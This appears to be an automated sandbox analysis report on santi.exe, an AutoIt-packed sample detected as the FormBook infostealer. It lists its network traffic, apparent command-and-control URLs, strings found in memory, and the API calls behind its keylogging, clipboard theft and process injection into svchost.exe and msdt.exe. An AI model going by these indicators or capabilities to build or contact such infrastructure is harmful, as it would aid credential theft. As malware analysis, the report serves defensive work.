Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:36:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: lavilIyGJqg.exe, 0000000C.00000002.3132349262.0000000002D75000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.espiritismo.info
                Source: lavilIyGJqg.exe, 0000000C.00000002.3132349262.0000000002D75000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.espiritismo.info/4knb/
                Source: msdt.exe, 0000000B.00000002.3133665309.000000000576C000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003BFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gmx.net/produkte/homepage-mail/homepage-parken/
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2ng
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033f
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msdt.exe, 0000000B.00000002.3129214060.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: msdt.exe, 0000000B.00000003.1913301207.00000000076FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: firefox.exe, 00000010.00000002.2038827866.000000000A714000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://t.me/NVission
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: msdt.exe, 0000000B.00000002.3133665309.00000000052B6000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003746000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00336B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00336B0C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00336D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00336D07
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00336B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00336B0C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00322B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00322B37

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\santi.exeCode function: This is a third-party compiled AutoIt script.0_2_002E3D19
                Source: santi.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: santi.exe, 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_062165a9-3
                Source: santi.exe, 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 1SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6851b28f-6
                Source: santi.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_62d61a14-1
                Source: santi.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_02407bd6-1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0071C5E3 NtClose,7_2_0071C5E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272B60 NtClose,LdrInitializeThunk,7_2_03272B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03272DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032735C0 NtCreateMutant,LdrInitializeThunk,7_2_032735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03274340 NtSetContextThread,7_2_03274340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03274650 NtSuspendThread,7_2_03274650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272BA0 NtEnumerateValueKey,7_2_03272BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272B80 NtQueryInformationFile,7_2_03272B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272BE0 NtQueryValueKey,7_2_03272BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272BF0 NtAllocateVirtualMemory,7_2_03272BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272AB0 NtWaitForSingleObject,7_2_03272AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272AF0 NtWriteFile,7_2_03272AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272AD0 NtReadFile,7_2_03272AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272F30 NtCreateSection,7_2_03272F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272F60 NtCreateProcessEx,7_2_03272F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272FA0 NtQuerySection,7_2_03272FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272FB0 NtResumeThread,7_2_03272FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272F90 NtProtectVirtualMemory,7_2_03272F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272FE0 NtCreateFile,7_2_03272FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272E30 NtWriteVirtualMemory,7_2_03272E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272EA0 NtAdjustPrivilegesToken,7_2_03272EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272E80 NtReadVirtualMemory,7_2_03272E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272EE0 NtQueueApcThread,7_2_03272EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272D30 NtUnmapViewOfSection,7_2_03272D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272D00 NtSetInformationFile,7_2_03272D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272D10 NtMapViewOfSection,7_2_03272D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272DB0 NtEnumerateKey,7_2_03272DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272DD0 NtDelayExecution,7_2_03272DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272C00 NtQueryInformationProcess,7_2_03272C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272C60 NtCreateKey,7_2_03272C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272C70 NtFreeVirtualMemory,7_2_03272C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272CA0 NtQueryInformationToken,7_2_03272CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272CF0 NtOpenProcess,7_2_03272CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272CC0 NtQueryVirtualMemory,7_2_03272CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03273010 NtOpenDirectoryObject,7_2_03273010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03273090 NtSetValueKey,7_2_03273090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032739B0 NtGetContextThread,7_2_032739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03273D10 NtOpenProcessToken,7_2_03273D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03273D70 NtOpenThread,7_2_03273D70
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04784650 NtSuspendThread,LdrInitializeThunk,11_2_04784650
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04784340 NtSetContextThread,LdrInitializeThunk,11_2_04784340
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04782C70
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782C60 NtCreateKey,LdrInitializeThunk,11_2_04782C60
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04782CA0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04782D30
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04782D10
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04782DF0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782DD0 NtDelayExecution,LdrInitializeThunk,11_2_04782DD0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04782EE0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04782E80
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782F30 NtCreateSection,LdrInitializeThunk,11_2_04782F30
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782FE0 NtCreateFile,LdrInitializeThunk,11_2_04782FE0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782FB0 NtResumeThread,LdrInitializeThunk,11_2_04782FB0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782AF0 NtWriteFile,LdrInitializeThunk,11_2_04782AF0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782AD0 NtReadFile,LdrInitializeThunk,11_2_04782AD0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782B60 NtClose,LdrInitializeThunk,11_2_04782B60
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04782BF0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04782BE0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04782BA0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047835C0 NtCreateMutant,LdrInitializeThunk,11_2_047835C0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047839B0 NtGetContextThread,LdrInitializeThunk,11_2_047839B0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782C00 NtQueryInformationProcess,11_2_04782C00
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782CF0 NtOpenProcess,11_2_04782CF0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782CC0 NtQueryVirtualMemory,11_2_04782CC0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782D00 NtSetInformationFile,11_2_04782D00
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782DB0 NtEnumerateKey,11_2_04782DB0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782E30 NtWriteVirtualMemory,11_2_04782E30
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782EA0 NtAdjustPrivilegesToken,11_2_04782EA0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782F60 NtCreateProcessEx,11_2_04782F60
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782FA0 NtQuerySection,11_2_04782FA0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782F90 NtProtectVirtualMemory,11_2_04782F90
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782AB0 NtWaitForSingleObject,11_2_04782AB0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04782B80 NtQueryInformationFile,11_2_04782B80
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04783010 NtOpenDirectoryObject,11_2_04783010
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04783090 NtSetValueKey,11_2_04783090
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04783D70 NtOpenThread,11_2_04783D70
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04783D10 NtOpenProcessToken,11_2_04783D10
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_004392D0 NtCreateFile,11_2_004392D0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00439440 NtReadFile,11_2_00439440
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00439530 NtDeleteFile,11_2_00439530
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_004395E0 NtClose,11_2_004395E0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00439740 NtAllocateVirtualMemory,11_2_00439740
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00326606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00326606
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0031ACC5
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003279D3
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0030B0430_2_0030B043
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031410F0_2_0031410F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003002A40_2_003002A4
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002EE3B00_2_002EE3B0
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031038E0_2_0031038E
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031467F0_2_0031467F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003006D90_2_003006D9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0034AACE0_2_0034AACE
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00314BEF0_2_00314BEF
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0030CCC10_2_0030CCC1
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E6F070_2_002E6F07
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002EAF500_2_002EAF50
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FB11F0_2_002FB11F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003431BC0_2_003431BC
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0030D1B90_2_0030D1B9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0030123A0_2_0030123A
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002F32000_2_002F3200
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031724D0_2_0031724D
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E93F00_2_002E93F0
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003213CA0_2_003213CA
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FF5630_2_002FF563
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E96C00_2_002E96C0
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032B6CC0_2_0032B6CC
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E77B00_2_002E77B0
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003179C90_2_003179C9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FFA570_2_002FFA57
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FDA960_2_002FDA96
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E9B600_2_002E9B60
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002F3B700_2_002F3B70
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E7D190_2_002E7D19
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FFE6F0_2_002FFE6F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00309ED00_2_00309ED0
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E7FA30_2_002E7FA3
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00E185A00_2_00E185A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_007085A37_2_007085A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_007000637_2_00700063
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006FE0437_2_006FE043
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006FE1DC7_2_006FE1DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006FE1877_2_006FE187
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006FE1937_2_006FE193
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006F12407_2_006F1240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0071EBE37_2_0071EBE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006F15407_2_006F1540
